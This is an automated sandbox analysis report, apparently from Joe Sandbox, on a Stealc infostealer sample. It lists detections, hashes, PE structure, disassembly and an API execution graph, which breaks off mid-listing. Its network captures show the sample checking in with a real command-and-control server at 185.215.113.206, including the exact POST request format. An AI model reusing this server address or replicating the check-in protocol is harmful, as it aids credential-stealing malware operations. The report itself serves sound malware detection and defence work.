              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php/K100%Avira URL Cloudmalware
              http://185.215.113.206Z0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.php?file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php/Kfile.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206Zfile.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.206
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1561529
                        Start date and time:2024-11-23 16:53:07 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 2s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:2
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 125
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/c4becf79229cb002.php
                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                        • 185.215.113.206/c4becf79229cb002.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 185.215.113.16

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.94546065873633
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'798'144 bytes
                        MD5:915ecb2949f1c2ad737caa35856b4584
                        SHA1:deaf66961d8b2dda755377ab791b8907b71cf9b5
                        SHA256:9784693e6d3fe06c253e47536652da2ac85aa94b2d05d83230b2f9734529f854
                        SHA512:bb015aeefc7151b3976e7643a143a0b9e3c47ab93d876186af9bd5dd582e900e21662f177f62021db803289b38d69839d26d463bf7d954ef8ab319289346cf0a
                        SSDEEP:49152:aIGvHJ5IqgYd4DInvoXmnNDCcdYUDSJ5wup:aIUIqgYd40nvNDp45Rp
                        TLSH:FD8533DD29AA43F8F0E22B3917E162FD6A51950444E423651F9FA8CFF8B4B0793794D0
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xa94000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007FD97882C5FAh
                        cmovle ebx, dword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x2490000x162007b48a3b3539ce95e43fb7fdb6fb51ca1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x24a0000x2b00x20007fcc5af7ddad7d6c154e625a6635903False0.796875data6.028361727806696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x24c0000x2a90000x2006fa911217c02cd1e146ec67a928879a2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        enovjnaf0x4f50000x19e0000x19d20028a16bbeab16bf81fb8bc3778bfff1fbFalse0.9947812263615734data7.954450679533088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        oxoldoae0x6930000x10000x4004df15ce44e18016618c369444fc9cc7aFalse0.763671875data6.0238903316739965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6940000x30000x22002a1eff96a9f2c8a3af854eebd2980b0dFalse0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x691e440x256ASCII text, with CRLF line terminators0.5100334448160535

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-23T16:54:02.395097+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 23, 2024 16:54:00.463327885 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:00.589762926 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:00.589860916 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:00.590092897 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:00.709779978 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:01.938766003 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:01.938855886 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:01.942598104 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:02.064785004 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:02.394994974 CET8049704185.215.113.206192.168.2.5
                        Nov 23, 2024 16:54:02.395097017 CET4970480192.168.2.5185.215.113.206
                        Nov 23, 2024 16:54:06.047066927 CET4970480192.168.2.5185.215.113.206

                        HTTP Request Dependency Graph

                        • 185.215.113.206

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704185.215.113.206805296C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Nov 23, 2024 16:54:00.590092897 CET90OUTGET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 23, 2024 16:54:01.938766003 CET203INHTTP/1.1 200 OK
                        Date: Sat, 23 Nov 2024 15:54:01 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 23, 2024 16:54:01.942598104 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIE
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 42 32 38 44 30 44 45 31 33 45 34 32 35 35 38 33 30 34 33 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a
                        Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"93B28D0DE13E4255830438------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
                        Nov 23, 2024 16:54:02.394994974 CET210INHTTP/1.1 200 OK
                        Date: Sat, 23 Nov 2024 15:54:02 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:10:53:57
                        Start date:23/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x510000
                        File size:1'798'144 bytes
                        MD5 hash:915ECB2949F1C2AD737CAA35856B4584
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2040482339.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:4.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.3%
                          Total number of Nodes:1405
                          Total number of Limit Nodes:28
                          execution_graph 27233 532853 lstrcpy 27244 532cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27256 523959 244 API calls 27261 5201d9 126 API calls 27245 533cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27285 5333c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27271 528615 49 API calls 27286 528615 48 API calls 27234 52e049 147 API calls 25796 531bf0 25848 512a90 25796->25848 25800 531c03 25801 531c29 lstrcpy 25800->25801 25802 531c35 25800->25802 25801->25802 25803 531c65 ExitProcess 25802->25803 25804 531c6d GetSystemInfo 25802->25804 25805 531c85 25804->25805 25806 531c7d ExitProcess 25804->25806 25949 511030 GetCurrentProcess VirtualAllocExNuma 25805->25949 25811 531ca2 25812 531cb8 25811->25812 25813 531cb0 ExitProcess 25811->25813 25961 532ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25812->25961 25815 531ce7 lstrlen 25820 531cff 25815->25820 25816 531cbd 25816->25815 26170 532a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25816->26170 25818 531cd1 25818->25815 25822 531ce0 ExitProcess 25818->25822 25819 531d23 lstrlen 25821 531d39 25819->25821 25820->25819 25823 531d13 lstrcpy lstrcat 25820->25823 25824 531d5a 25821->25824 25826 531d46 lstrcpy lstrcat 25821->25826 25823->25819 25825 532ad0 3 API calls 25824->25825 25827 531d5f lstrlen 25825->25827 25826->25824 25829 531d74 25827->25829 25828 531d9a lstrlen 25830 531db0 25828->25830 25829->25828 25831 531d87 lstrcpy lstrcat 25829->25831 25832 531dce 25830->25832 25833 531dba lstrcpy lstrcat 25830->25833 25831->25828 25963 532a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25832->25963 25833->25832 25835 531dd3 lstrlen 25836 531de7 25835->25836 25837 531df7 lstrcpy lstrcat 25836->25837 25838 531e0a 25836->25838 25837->25838 25839 531e28 lstrcpy 25838->25839 25840 531e30 25838->25840 25839->25840 25841 531e56 OpenEventA 25840->25841 25842 531e68 CloseHandle Sleep OpenEventA 25841->25842 25843 531e8c CreateEventA 25841->25843 25842->25842 25842->25843 25964 531b20 GetSystemTime 25843->25964 25847 531ea5 CloseHandle ExitProcess 26171 514a60 25848->26171 25850 512aa1 25851 514a60 2 API calls 25850->25851 25852 512ab7 25851->25852 25853 514a60 2 API calls 25852->25853 25854 512acd 25853->25854 25855 514a60 2 API calls 25854->25855 25856 512ae3 25855->25856 25857 514a60 2 API calls 25856->25857 25858 512af9 25857->25858 25859 514a60 2 API calls 25858->25859 25860 512b0f 25859->25860 25861 514a60 2 API calls 25860->25861 25862 512b28 25861->25862 25863 514a60 2 API calls 25862->25863 25864 512b3e 25863->25864 25865 514a60 2 API calls 25864->25865 25866 512b54 25865->25866 25867 514a60 2 API calls 25866->25867 25868 512b6a 25867->25868 25869 514a60 2 API calls 25868->25869 25870 512b80 25869->25870 25871 514a60 2 API calls 25870->25871 25872 512b96 25871->25872 25873 514a60 2 API calls 25872->25873 25874 512baf 25873->25874 25875 514a60 2 API calls 25874->25875 25876 512bc5 25875->25876 25877 514a60 2 API calls 25876->25877 25878 512bdb 25877->25878 25879 514a60 2 API calls 25878->25879 25880 512bf1 25879->25880 25881 514a60 2 API calls 25880->25881 25882 512c07 25881->25882 25883 514a60 2 API calls 25882->25883 25884 512c1d 25883->25884 25885 514a60 2 API calls 25884->25885 25886 512c36 25885->25886 25887 514a60 2 API calls 25886->25887 25888 512c4c 25887->25888 25889 514a60 2 API calls 25888->25889 25890 512c62 25889->25890 25891 514a60 2 API calls 25890->25891 25892 512c78 25891->25892 25893 514a60 2 API calls 25892->25893 25894 512c8e 25893->25894 25895 514a60 2 API calls 25894->25895 25896 512ca4 25895->25896 25897 514a60 2 API calls 25896->25897 25898 512cbd 25897->25898 25899 514a60 2 API calls 25898->25899 25900 512cd3 25899->25900 25901 514a60 2 API calls 25900->25901 25902 512ce9 25901->25902 25903 514a60 2 API calls 25902->25903 25904 512cff 25903->25904 25905 514a60 2 API calls 25904->25905 25906 512d15 25905->25906 25907 514a60 2 API calls 25906->25907 25908 512d2b 25907->25908 25909 514a60 2 API calls 25908->25909 25910 512d44 25909->25910 25911 514a60 2 API calls 25910->25911 25912 512d5a 25911->25912 25913 514a60 2 API calls 25912->25913 25914 512d70 25913->25914 25915 514a60 2 API calls 25914->25915 25916 512d86 25915->25916 25917 514a60 2 API calls 25916->25917 25918 512d9c 25917->25918 25919 514a60 2 API calls 25918->25919 25920 512db2 25919->25920 25921 514a60 2 API calls 25920->25921 25922 512dcb 25921->25922 25923 514a60 2 API calls 25922->25923 25924 512de1 25923->25924 25925 514a60 2 API calls 25924->25925 25926 512df7 25925->25926 25927 514a60 2 API calls 25926->25927 25928 512e0d 25927->25928 25929 514a60 2 API calls 25928->25929 25930 512e23 25929->25930 25931 514a60 2 API calls 25930->25931 25932 512e39 25931->25932 25933 514a60 2 API calls 25932->25933 25934 512e52 25933->25934 25935 536390 GetPEB 25934->25935 25936 5365c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25935->25936 25937 5363c3 25935->25937 25938 536625 GetProcAddress 25936->25938 25939 536638 25936->25939 25944 5363d7 20 API calls 25937->25944 25938->25939 25940 536641 GetProcAddress GetProcAddress 25939->25940 25941 53666c 25939->25941 25940->25941 25942 536675 GetProcAddress 25941->25942 25943 536688 25941->25943 25942->25943 25945 536691 GetProcAddress 25943->25945 25946 5366a4 25943->25946 25944->25936 25945->25946 25947 5366d7 25946->25947 25948 5366ad GetProcAddress GetProcAddress 25946->25948 25947->25800 25948->25947 25950 511057 ExitProcess 25949->25950 25951 51105e VirtualAlloc 25949->25951 25952 51107d 25951->25952 25953 5110b1 25952->25953 25954 51108a VirtualFree 25952->25954 25955 5110c0 25953->25955 25954->25953 25956 5110d0 GlobalMemoryStatusEx 25955->25956 25958 511112 ExitProcess 25956->25958 25959 5110f5 25956->25959 25959->25958 25960 51111a GetUserDefaultLangID 25959->25960 25960->25811 25960->25812 25962 532b24 25961->25962 25962->25816 25963->25835 26176 531820 25964->26176 25966 531b81 sscanf 26215 512a20 25966->26215 25969 531bd6 25970 531be9 25969->25970 25971 531be2 ExitProcess 25969->25971 25972 52ffd0 25970->25972 25973 52ffe0 25972->25973 25974 530019 lstrlen 25973->25974 25975 53000d lstrcpy 25973->25975 25976 5300d0 25974->25976 25975->25974 25977 5300e7 lstrlen 25976->25977 25978 5300db lstrcpy 25976->25978 25979 5300ff 25977->25979 25978->25977 25980 530116 lstrlen 25979->25980 25981 53010a lstrcpy 25979->25981 25982 53012e 25980->25982 25981->25980 25983 530145 25982->25983 25984 530139 lstrcpy 25982->25984 26217 531570 25983->26217 25984->25983 25987 53016e 25988 530183 lstrcpy 25987->25988 25989 53018f lstrlen 25987->25989 25988->25989 25990 5301a8 25989->25990 25991 5301c9 lstrlen 25990->25991 25992 5301bd lstrcpy 25990->25992 25993 5301e8 25991->25993 25992->25991 25994 530200 lstrcpy 25993->25994 25995 53020c lstrlen 25993->25995 25994->25995 25996 53026a 25995->25996 25997 530282 lstrcpy 25996->25997 25998 53028e 25996->25998 25997->25998 26227 512e70 25998->26227 26006 530540 26007 531570 4 API calls 26006->26007 26008 53054f 26007->26008 26009 5305a1 lstrlen 26008->26009 26010 530599 lstrcpy 26008->26010 26011 5305bf 26009->26011 26010->26009 26012 5305d1 lstrcpy lstrcat 26011->26012 26013 5305e9 26011->26013 26012->26013 26014 530614 26013->26014 26015 53060c lstrcpy 26013->26015 26016 53061b lstrlen 26014->26016 26015->26014 26017 530636 26016->26017 26018 53064a lstrcpy lstrcat 26017->26018 26019 530662 26017->26019 26018->26019 26020 530687 26019->26020 26021 53067f lstrcpy 26019->26021 26022 53068e lstrlen 26020->26022 26021->26020 26023 5306b3 26022->26023 26024 5306c7 lstrcpy lstrcat 26023->26024 26025 5306db 26023->26025 26024->26025 26026 530704 lstrcpy 26025->26026 26027 53070c 26025->26027 26026->26027 26028 530751 26027->26028 26029 530749 lstrcpy 26027->26029 26983 532740 GetWindowsDirectoryA 26028->26983 26029->26028 26031 530785 26992 514c50 26031->26992 26032 53075d 26032->26031 26034 53077d lstrcpy 26032->26034 26034->26031 26035 53078f 27146 528ca0 StrCmpCA 26035->27146 26037 53079b 26038 511530 8 API calls 26037->26038 26039 5307bc 26038->26039 26040 5307e5 lstrcpy 26039->26040 26041 5307ed 26039->26041 26040->26041 27164 5160d0 80 API calls 26041->27164 26043 5307fa 27165 5281b0 10 API calls 26043->27165 26045 530809 26046 511530 8 API calls 26045->26046 26047 53082f 26046->26047 26048 530856 lstrcpy 26047->26048 26049 53085e 26047->26049 26048->26049 27166 5160d0 80 API calls 26049->27166 26051 53086b 27167 527ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26051->27167 26053 530876 26054 511530 8 API calls 26053->26054 26055 5308a1 26054->26055 26056 5308d5 26055->26056 26057 5308c9 lstrcpy 26055->26057 27168 5160d0 80 API calls 26056->27168 26057->26056 26059 5308db 27169 528050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26059->27169 26061 5308e6 26062 511530 8 API calls 26061->26062 26063 5308f7 26062->26063 26064 530926 lstrcpy 26063->26064 26065 53092e 26063->26065 26064->26065 27170 515640 8 API calls 26065->27170 26067 530933 26068 511530 8 API calls 26067->26068 